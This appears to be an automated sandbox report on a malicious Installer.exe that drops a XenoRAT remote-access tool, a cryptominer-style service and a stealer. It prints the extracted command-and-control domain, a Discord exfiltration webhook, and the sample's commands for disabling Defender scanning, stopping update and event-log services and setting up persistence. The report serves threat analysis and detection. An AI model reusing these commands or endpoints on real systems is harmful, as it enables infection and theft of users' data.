Analysis
max time kernel: 188s
max time network: 188s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 18-04-2024 22:05
Static task: static1
Behavioral task: behavioral1 (Sample: Installer.exe, Resource: win7-20240221-en)
Behavioral task: behavioral2 (Sample: Installer.exe, Resource: win10v2004-20240412-en)
General
Target: Installer.exe
Size: 12.6MB
MD5: e560d8abab1b94fa698c5164b10c4fa5
SHA1: 7b7e2334f06610ebcb9ac796c471961df6a6c377
SHA256: 817cac7fcfdc0f48444c45be772997707761e2ca1e43e8d53f8f7e0e7a1e42b0
SHA512: cc546819fbf9cb40c8bd7c9f686b2d7e189b624fc94a8075e0a43ebcf83d28ed4fc51227c3450e94de91e2c72ce6ce68d7f5e6f8e9e390406da4bcc32470af16
SSDEEP: 196608:MgINJY5ucj/+mDZR65PzwNVnQwOsayF0RjPLIp+I3U84IXrTNtNp0GIUOueu/ty:MR+59nYRzw0wlF0RjPLIECU84EJ49h
Malware Config
Extracted: xenorat
jctestwindows.airdns.org
Xeno_rat_nd8913d
delay: 5000
install_path: temp
port: 45010
startup_name: WindowsErrorHandler
Extracted: growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 35 IoCs
resource yara_rule behavioral1/memory/2504-60-0x00000000004F0000-0x000000000055C000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-68-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-69-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-71-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-73-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-75-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-77-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-81-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-79-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-83-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-85-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-97-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-99-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-101-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-105-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-107-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-109-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-111-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-103-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-113-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-115-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 
behavioral1/memory/2504-117-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-119-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-121-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-123-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-127-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-129-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-131-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-133-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-135-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-137-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-139-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-125-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-141-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/1988-311-0x000000001B200000-0x000000001B280000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
Stops running service(s) 3 TTPs
Executes dropped EXE 9 IoCs
pid   Process
2504  Ilkdt.exe
2016  WinHostMgr.exe
2240  WinErrorMgr.exe
2704  KeyGeneratorI.exe
1988  Sahyui1337.exe
888   KeyGeneratorI.exe
2120  WinErrorMgr.exe
464   Process not Found
996   bauwrdgwodhv.exe
Loads dropped DLL 9 IoCs
pid   Process
2232  Installer.exe (6 events)
888   KeyGeneratorI.exe
2240  WinErrorMgr.exe
464   Process not Found
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow  ioc
3     discord.com
4     discord.com
9     pastebin.com
10    pastebin.com
Drops file in System32 directory 4 IoCs
description                   ioc                                                                                                                  Process
File opened for modification  C:\Windows\system32\MRT.exe                                                                                          WinHostMgr.exe
File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
File opened for modification  C:\Windows\system32\MRT.exe                                                                                          bauwrdgwodhv.exe
File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Suspicious use of SetThreadContext 2 IoCs
description                          pid  Process           procid_target
PID 996 set thread context of 2924   996  bauwrdgwodhv.exe  100
PID 996 set thread context of 1656   996  bauwrdgwodhv.exe  102
Drops file in Windows directory 2 IoCs
description   ioc                     Process
File created  C:\Windows\wusa.lock    wusa.exe
File created  C:\Windows\wusa.lock    wusa.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
pid   Process
1624  sc.exe
2948  sc.exe
2096  sc.exe
1368  sc.exe
2468  sc.exe
2380  sc.exe
2728  sc.exe
1768  sc.exe
1528  sc.exe
2428  sc.exe
2784  sc.exe
2196  sc.exe
1156  sc.exe
2112  sc.exe
Detects Pyinstaller 1 IoCs
resource                                        yara_rule
behavioral1/files/0x002b000000015c25-24.dat     pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
2312  schtasks.exe
Modifies data under HKEY_USERS 6 IoCs
description       ioc                                                                                                                      Process
Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs                                                  explorer.exe
Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                                     powershell.exe
Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60132dc4dc91da01  powershell.exe
Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT                                                       explorer.exe
Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates                                          explorer.exe
Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs                                                  explorer.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2424 powershell.exe 1988 Sahyui1337.exe 1988 Sahyui1337.exe 2016 WinHostMgr.exe 1464 powershell.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 996 bauwrdgwodhv.exe 1248 powershell.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid   Process
464   Process not Found
Suspicious use of AdjustPrivilegeToken 14 IoCs
description                   pid   Process
Token: SeDebugPrivilege       2504  Ilkdt.exe
Token: SeDebugPrivilege       2424  powershell.exe
Token: SeDebugPrivilege       1988  Sahyui1337.exe
Token: SeDebugPrivilege       1464  powershell.exe
Token: SeShutdownPrivilege    844   powercfg.exe
Token: SeShutdownPrivilege    1868  powercfg.exe
Token: SeShutdownPrivilege    1864  powercfg.exe
Token: SeShutdownPrivilege    852   powercfg.exe
Token: SeDebugPrivilege       1248  powershell.exe
Token: SeShutdownPrivilege    368   powercfg.exe
Token: SeShutdownPrivilege    1640  powercfg.exe
Token: SeShutdownPrivilege    2204  powercfg.exe
Token: SeShutdownPrivilege    1828  powercfg.exe
Token: SeLockMemoryPrivilege  1656  explorer.exe
Suspicious use of WriteProcessMemory 55 IoCs
description                          pid   Process            procid_target  events
PID 2232 wrote to memory of 2424     2232  Installer.exe      31             4
PID 2232 wrote to memory of 2504     2232  Installer.exe      33             4
PID 2232 wrote to memory of 2016     2232  Installer.exe      34             4
PID 2232 wrote to memory of 2240     2232  Installer.exe      35             4
PID 2232 wrote to memory of 2704     2232  Installer.exe      36             4
PID 2232 wrote to memory of 1988     2232  Installer.exe      37             4
PID 2704 wrote to memory of 888      2704  KeyGeneratorI.exe  40             3
PID 2240 wrote to memory of 2120     2240  WinErrorMgr.exe    43             4
PID 2120 wrote to memory of 2312     2120  WinErrorMgr.exe    44             4
PID 2252 wrote to memory of 584      2252  cmd.exe            53             3
PID 1544 wrote to memory of 2456     1544  cmd.exe            84             3
PID 996 wrote to memory of 2924      996   bauwrdgwodhv.exe   100            9
PID 996 wrote to memory of 1656      996   bauwrdgwodhv.exe   102            5
Processes

C:\Users\Admin\AppData\Local\Temp\Installer.exe  (PID 2232, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Installer.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2424, level 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="
    Decoded from the base64 (UTF-16LE) above: <#mmb#>Add-MpPreference <#vpi#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gni#> -Force <#rqv#>
    (the inline <#...#> comments are padding; the effective command adds the user profile and the whole system drive to Defender's exclusion list)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe  (PID 2504, level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe  (PID 2016, level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 1464, level 3)
      Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 2252, level 3)
      Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\wusa.exe  (PID 584, level 4)
        Command line: wusa /uninstall /kb:890830 /quiet /norestart
        - Drops file in Windows directory

    C:\Windows\system32\sc.exe  (PID 1624, level 3)
      Command line: C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 2728, level 3)
      Command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 2948, level 3)
      Command line: C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 1768, level 3)
      Command line: C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 2096, level 3)
      Command line: C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe

    C:\Windows\system32\powercfg.exe  (PID 852, level 3)
      Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe  (PID 1868, level 3)
      Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe  (PID 1864, level 3)
      Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe  (PID 844, level 3)
      Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\sc.exe  (PID 1368, level 3)
      Command line: C:\Windows\system32\sc.exe delete "GMDTJRUT"
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 1528, level 3)
      Command line: C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 2112, level 3)
      Command line: C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe

    C:\Windows\system32\sc.exe  (PID 1156, level 3)
      Command line: C:\Windows\system32\sc.exe start "GMDTJRUT"
      - Launches sc.exe
  C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe  (PID 2240, level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe  (PID 2120, level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\schtasks.exe  (PID 2312, level 4)
        Command line: "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFDEE.tmp" /F
        - Creates scheduled task(s)
  C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe  (PID 2704, level 2)
    Command line: "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe  (PID 888, level 3)
      Command line: "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe  (PID 1988, level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\explorer.exe  (PID 1036, level 1)
  Command line: "C:\Windows\explorer.exe"
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe  (PID 996, level 1)
  Command line: C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 1248, level 2)
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe  (PID 1544, level 2)
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\wusa.exe  (PID 2456, level 3)
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
      - Drops file in Windows directory

  C:\Windows\system32\sc.exe  (PID 2380, level 2)
    Command line: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe

  C:\Windows\system32\sc.exe  (PID 2468, level 2)
    Command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe

  C:\Windows\system32\sc.exe  (PID 2428, level 2)
    Command line: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe

  C:\Windows\system32\sc.exe  (PID 2784, level 2)
    Command line: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe

  C:\Windows\system32\sc.exe  (PID 2196, level 2)
    Command line: C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe

  C:\Windows\system32\powercfg.exe  (PID 368, level 2)
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe  (PID 1828, level 2)
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe  (PID 1640, level 2)
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\powercfg.exe  (PID 2204, level 2)
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\conhost.exe  (PID 2924, level 2)
    Command line: C:\Windows\system32\conhost.exe

  C:\Windows\explorer.exe  (PID 1656, level 2)
    Command line: explorer.exe
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 316KB
MD5: 675d9e9ab252981f2f919cf914d9681d
SHA1: 7485f5c9da283475136df7fa8b62756efbb5dd17
SHA256: 0f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA512: 9dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb

Filesize: 6.7MB
MD5: 48ebfefa21b480a9b0dbfc3364e1d066
SHA1: b44a3a9b8c585b30897ddc2e4249dfcfd07b700a
SHA256: 0cc4e557972488eb99ea4aeb3d29f3ade974ef3bcd47c211911489a189a0b6f2
SHA512: 4e6194f1c55b82ee41743b35d749f5d92a955b219decacf9f1396d983e0f92ae02089c7f84a2b8296a3062afa3f9c220da9b7cd9ed01b3315ea4a953b4ecc6ce

Filesize: 1KB
MD5: 7f673f709ab0e7278e38f0fd8e745cd4
SHA1: ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256: da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512: e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LH1OOSU3M8X22XPD6Q39.temp
Filesize: 7KB
MD5: a5e879c79094f55446393a7f551b2cc3
SHA1: c0526922e575e9bd0f053d18b11094753c93596e
SHA256: 3f8be8d6b2302947c879e9e469d31bb8365dbe9d435069171883b4ce19bb87ac
SHA512: 78d091b9fe5854d60c913b4d22f540e42a826cd1c470f74085cd0427acd43bc924fa13bdb559f77afcde422318c9b76c2e62eb59ce78edea6113142a4cceb4d8

Filesize: 191KB
MD5: e004a568b841c74855f1a8a5d43096c7
SHA1: b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256: d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512: 402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af

Filesize: 42KB
MD5: d499e979a50c958f1a67f0e2a28af43d
SHA1: 1e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256: bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512: 668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763

Filesize: 5.0MB
MD5: e222309197c5e633aa8e294ba4bdcd29
SHA1: 52b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256: 047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA512: 9eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503

Filesize: 6.9MB
MD5: d1ebfb3ff83375dc6897e50a95e8b2a5
SHA1: fd1cb7ac0181ee647419761871dd78ad0a09d44a
SHA256: ec709b3a8a2d6df0c990303226ef5d8fea4d4270add2d06e69b0db8b913fcd06
SHA512: f210610472f34ff991a93bf290deb7d76e38b11d534b21ac689f53432e018e12792d801d38afbfd722fdaea21f4cad47ca5a09b2f7c983d73cec57e01a9d5d63